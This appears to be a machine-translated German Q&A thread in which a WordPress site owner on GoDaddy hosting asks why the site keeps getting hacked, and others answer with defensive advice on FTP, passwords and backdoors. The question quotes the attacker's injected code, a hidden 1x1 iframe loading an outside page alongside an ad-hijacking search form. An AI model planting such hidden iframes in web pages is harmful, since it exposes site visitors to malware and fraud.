Website erneut gehackt

7

Letztes Update:

Die Dinge waren in den letzten Wochen friedlich und haben mir viel mehr über die Sicherheit und die Risiken von Websites beigebracht. Hier ist meine Version der Geschichte -

Ich habe eine ältere Version von WordPress verwendet und wahrscheinlich hat mich diese Person von Google erwischt. Ich denke, es war ein Skriptangriff. Es ist schwer zu sagen, wie und wann die Sicherheit tatsächlich gefährdet wurde, aber ich wurde am 5. November 2009 darauf aufmerksam. Ich habe zu diesem Zeitpunkt zwar einige Sicherheitsmaßnahmen ergriffen (siehe unten), aber es besteht immer die Möglichkeit, dass ich es versäumt habe, WordPress-Passwörter zu ändern, wenn Ich habe meinen Arbeitscomputer formatiert.

Jetzt habe ich alle nicht erforderlichen PHP-Skripte vom Hosting gelöscht, den Verwaltungsteil nur für meine IP zugänglich gemacht und einen bestimmten IP-Bereich blockiert, der zu Vietnam gehört. Tägliche Backups und andere Dinge. Die Sache ist, dass es so viele Variablen gibt und es zu schwierig ist, alles im Auge zu behalten. Die Hauptstunde ist darauf vorbereitet. :) :)


Ich habe einen gemeinsamen Hosting-Plan von GoDaddy und betreibe eine WordPress-Website. Meine Website wurde am 5. November 2009 zum ersten Mal gehackt. Zu diesem Zeitpunkt ersetzte der Hacker meine Anzeigen durch seine eigenen. Ich dachte, es sei wegen meiner Faulheit mit der Sicherheit passiert, aber ich habe mich so geirrt.

Ich habe meinen Computer formatiert und alles neu eingerichtet. ESET NOD32 wurde durch Microsoft Security Essentials ersetzt. Auf die neueste Version von WordPress aktualisiert. Alle Passwörter geändert. Richten Sie eine neue Datenbank ein. Und andere sicherheitsrelevante Dinge, die ich hier und da gelesen habe. Die Dinge haben eine Weile gut funktioniert, bis meine Seite heute wieder gehackt wurde.

Das letzte Mal hat der Typ mit vielen Dateien gespielt und speziell footer.php und alle werbebezogenen Dateien geändert. Aber diesmal ging er einfach an die richtige Stelle und ersetzte durch folgenden Code -

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

Sieht so aus, als wäre diese Person nicht daran interessiert, Datenbanken usw. zu manipulieren, sondern nur Code zu platzieren und schnell Geld zu verdienen. Godaddy hat meine FTP-Protokolle weitergeleitet und es gab einen nicht autorisierten Zugriff von IP - 117.2.56.31. Diese IP gehört zu Vietnam und auch http://blackberryrss.com hat eine Verbindung zu Vietnam.

Es gibt keinen SSH-Zugriff auf mein Konto und ich verbinde mich über FireFTP mit FTP. Dies war GoDaddys Antwort beim letzten Mal -

Bei der Überprüfung Ihres Kontos haben wir festgestellt, dass Ihr FTP-Konto entweder aufgrund von Malware auf Ihrem lokalen Computer oder eines schwachen FTP- / Hosting-Passworts kompromittiert wurde.

Aber ich hatte alle Passwörter geändert, Konten gelöscht usw., aber nichts scheint zu funktionieren. Ich bin im Moment ahnungslos. Bitte sag mir was zu tun ist? Wie kann ich den unbefugten Zugriff auf mein Konto verhindern?

Zusätzliche Details:

  • Die Stärke des Passworts ist nur stark, aber nicht am besten.
  • Ich persönlich verwende Windows XP SP3, Windows Firewall usw. Nach dem ersten Angriff habe ich gelernt, mit einem Benutzerkonto zu arbeiten und ein Administratorkonto zu vermeiden.
  • Wenn ich FTP-Protokolle für den ersten Angriff sehe, ist es ziemlich klar, dass die Person dies alles manuell ausführt.
Arpit Tambi
quelle
Können Sie die Stärke Ihrer Passwörter preisgeben? Der folgende Link kann dabei helfen: microsoft.com/protect/fraud/passwords/checker.aspx
Jeff Yates
Welches GENAUE Betriebssystem verwenden Sie, welche Firewall, welche Dienste werden ausgeführt, welche Netzwerkkarten sind verfügbar? Geben Sie uns im Grunde genommen weitere Informationen. Wenn Sie sehen, was geändert wurde, reicht dies nicht aus. Wir müssen wissen, wie es geändert wurde. Oh und übrigens, dies wird ein Drehbuch gewesen sein, das Sie getroffen hat, keine Person für sich, sowieso zu 99% sicher.
Chopper3
4
Ich zögere, das zu sagen, aber FTP ist ein bisschen schmerzhaft. Ich wäre versucht, nach einem Hosting-Anbieter zu suchen, bei dem ich SFTP oder SCP verwenden kann. Aber das würde wahrscheinlich mehr Geld kosten.
Tom O'Connor
Weitere Details hinzugefügt, wird ein super starkes Passwort mit 16 Zeichen erhalten, aber ich glaube nicht, dass der Typ das aktuelle Passwort brutal erzwingen könnte.
Arpit Tambi
@ Tom Könnten Sie bitte auf SFTP oder SCP näher eingehen. Der Host bietet über seine Website auch ein webbasiertes FTP an. Ist das in Ordnung?
Arpit Tambi

Antworten:

8

Beachten Sie, dass FTP Ihr Passwort in CLEAR TEXT sendet. Das Kompromisspotential ist also definitiv vorhanden.

Eine andere zu berücksichtigende Sache, ist Ihr FTP-Passwort für Ihr Hosting EINZIGARTIG? Sind Sie sicher, dass Sie es nirgendwo anders verwenden? Keine anderen Konten, Websites usw.?

Wie sicher ist Ihr EMAIL-Passwort? Ich war in Fälle verwickelt, in denen das "schwache Glied" tatsächlich das E-MAIL-Passwort war und der Täter nur "vergessene Passwörter" an die E-Mail schickte und die Beweise aus der E-Mail-Box löschte, während alle zu beschäftigt waren, sich auf den kompromittierten Server zu konzentrieren beachten.

Nur ein paar Dinge, die mir in den Sinn kamen ... einige andere Dinge wären natürlich ein Social-Engineering-Ansatz mit Ihrem ISP oder eine Software-Schwachstelle auf Ihrem Server oder eines der Pakete, die Sie hosten.

Es gibt mehr (offensichtlich), aber das sind normalerweise die "üblichen Verdächtigen".


AKTUALISIEREN:

Aufgrund dieser neuen Informationen (dass der Hacker kein FTP zum Ändern Ihrer Dateien verwendet) kann ich nur annehmen, dass die wahrscheinlichste Ursache wahrscheinlich eine ungesicherte Web-App ist.

Das ist nicht das EINZIGE, was es sein kann, aber in solchen Fällen ist es am wahrscheinlichsten.

Eine andere Sache, die Sie berücksichtigen (und prüfen) sollten, ist, ob er sich eine Art "Hintertür" für Ihre App hinterlassen hat. Ich erinnere mich an Ihre Erwähnung, dass Ihr ISP sagte, er sei über FTP hereingekommen. Ist es möglich, dass er das erste Mal über FTP hereingekommen ist und sich eine Hintertür hinterlassen hat?

Es ist auch ein Schuss in die Dunkelheit, aber ich habe persönlich kompromittierte Kisten gesehen, in denen ein Hacker nur EINMAL kam, aber einen Cron-Job hinterließ, der ständig Dateien und andere verschiedene Übel wechselte. Ist es möglich, dass der Hacker NICHT zurückgekommen ist und Sie es mit einem automatisierten Skript zu tun haben? Nur etwas zu überprüfen, ob Sie das Gefühl haben, alle anderen Möglichkeiten ausgeschöpft zu haben.

Haben Sie schließlich Zugriff auf Ihre Webprotokolle, Systemprotokolle usw.? Wenn ja, was sagen sie? Zeigen sie irgendwelche Hinweise?

KPWINC
quelle
Das FTP-Konto, das ich gelegentlich verwende, ist nicht sehr einzigartig für das Hosting, aber ich verwende es nicht für E-Mails usw. Soll ich den Host wechseln? Sag mir was ich tun soll?
Arpit Tambi
1
+1 gute Ratschläge rundum
cop1152
Der Typ verwendet kein FTP, um mit meinen Dateien zu spielen. Was bedeutet das?
Arpit Tambi
2

Vielleicht möchten Sie Detail Post-Mortem eines WordPress-Hack lesen . Ein weiterer Beitrag, der viele Informationen über einen WordPress-Blog-Hack mit Links enthält. WordPress selbst hat eine FAQ darüber, was zu tun ist, nachdem Ihr Blog gehackt wurde.

WordPress ist eine stark zielgerichtete Anwendung, nur wegen ihrer Beliebtheit. Der Kampf gegen Hacker dieser Websites ist eine Vollzeitbeschäftigung. Aus Ihrer Beschreibung geht hervor, dass jemand einen Exploit von WordPress gefunden hat, der ihn zu seinem vollen Vorteil nutzt. Sie hören sich so an, als würden Sie bisher alles richtig machen, aber ich denke, dass der Angreifer eine Datei auf Ihre Site legt und den Angriff aus dieser Richtung. Der erste Link, auf den ich Sie hingewiesen habe, enthält eine sehr detaillierte Beschreibung dieser und der Schritte, die sie unternommen haben, um dem entgegenzuwirken.

Am Ende müssen Sie möglicherweise darüber nachdenken, von WordPress zu einer anderen Blogging-Anwendung zu wechseln. Viel Glück beim Verteidigen und hoffe, dass dies einigen hilft.

Chris
quelle
Das ist mir passiert. Ein Faktor, der zu mir beitrug, war, dass ich ein benutzerdefiniertes Thema hatte, das "Upgrades" nicht gut überlebte, und ich keine Zeit hatte, die Dinge weiter zu reparieren. Sobald ich gehackt wurde, warf ich das Handtuch. Jetzt bin ich einer der Milliarden Blogger. Einfaches Blog, ja - aber weniger Hack-Sorgen.
David Mackintosh
Ich habe alles getan, was du erwähnt hast, aber wieder gehackt, oops :(
Arpit Tambi
Dann würde ich zu einer anderen Blogging-Plattform wechseln. Ich würde lieber Zeit mit Bloggen verbringen, als Sicherheitslücken in einer Software aufzuspüren.
Chris
1

GoDaddy bietet Ihnen SSH-Zugriff und Sie können über Putty.exe auf Port 22 eine Verbindung zu Ihrem Konto herstellen. Sobald Sie verbunden sind, können Sie mit Putty 2 Proxys / Tunnel auf Port 20 und 21 erstellen. Anschließend können Sie FTP über den gesicherten Tunnel verwenden Holen Sie sich zu Ihren Dateien.

Oder, noch besser, Sie können das Gleiche mit dem Befehl PSFTP.exe viel einfacher tun oder mit dem FileZilla-Client eine Verbindung zu Port 22 herstellen.

Djangofan
quelle
Der Bösewicht verwendet kein FTP, um den Inhalt meiner Website zu ändern.
Arpit Tambi
1

Dumme Frage, aber - haben Sie versucht, das Passwort zu ändern und einen anderen Computer zu verwenden? Möglicherweise befindet sich auf Ihrem PC ein Tastendruck-Logger.

Ich vermute hier einen Streich oder zumindest einen gezielten Angriff. Ist jemand, den Sie kennen, bereit, einen solchen Witz zu spielen?

Treten Sie aus der Box, bevor Sie zu paranoid werden. Es hilft.

ps: oder vielleicht ein missbrauchtes WordPress-Thema. Oder falsche Anmeldeinformationen beim DB-Zugriff.

Lorenzog
quelle
1

Wenn Sie nicht alle FTP-Sitzungen über einen sicheren Tunnel ausführen (oder noch besser, verwenden Sie SFTP), wird dieses Kennwort abgehört.

Unsere Standardpraxis ist, überhaupt kein FTP zu haben. Bei Bedarf erlauben wir nur anonymes FTP und beschränken dies stark auf einen bekannten Bereich.

Wenn ein Upload erforderlich ist, ist die Auflistung des Upload-Verzeichnisses nicht zulässig.

lcbrevard
quelle
0

Um ehrlich zu sein, würde ich den ISP bitten, diese IP auf Firewall-Ebene zu blockieren. Wenn GoDaddy dazu nicht bereit ist, dann scheint es mir, dass sie ein verantwortungsloser Hoster sind, der keine Schritte unternimmt, um Ihre Daten zu schützen, und Sie sollten wechseln.

blackberryrss.com befindet sich in den USA, sodass Sie eine Hebelwirkung haben, die Sie nutzen können:
DNS-Material

Geben Sie hier die Publisher-ID an. Google ist EXTREM ernst, wenn es um betrügerische Aktivitäten in seinem AdSense-Netzwerk geht. Missbrauch von Google Adsense melden

Um ehrlich zu sein, sollte GoDaddy es nicht einmal zulassen, da das umgekehrte DNS dieser IP "localhost" ist, was eine RIESIGE rote Fahne ist. Es sollte nur 1 IPv4-Adresse in localhost aufgelöst werden (vorausgesetzt natürlich, wir sprechen nur über die Standard-IP-Adressen), und das ist 127.0.0.1. DNS-Zeug

Um noch tiefer in das Kaninchenloch zu graben, scheint Bluehost ihren Server zu hosten. Rufen Sie sie an und sehen Sie, was sie tun möchten (wenn überhaupt).

Und Sie haben immer die Möglichkeit, sich bei Ihren lokalen Behörden zu melden (es ist eine Straftat, Zugang zu Netzwerken und Computern zu erhalten, auf die Sie kein Recht oder Privileg haben).

Natalie Adams
quelle
Ich habe diese Publisher-ID heute früher gemeldet. Beim dritten Angriff platzierte der Hacker diesmal nur iframe ohne Anzeigencodes. Bisher jedoch keine Antwort von Google Adsense.
Arpit Tambi
Ich werde GoDaddy über diese IP sprechen. Ich habe bereits eine E-Mail an HostMonster gesendet, aber bisher keine Antwort erhalten. Vielleicht schicke ich auch eine E-Mail an bluehost.
Arpit Tambi
0

Ihr FTP-Passwort wird beschnüffelt, es passiert mit unseren dort gehosteten Websites sehr viel.

Dan
quelle
wird Hosting-Plan bald ändern
Arpit Tambi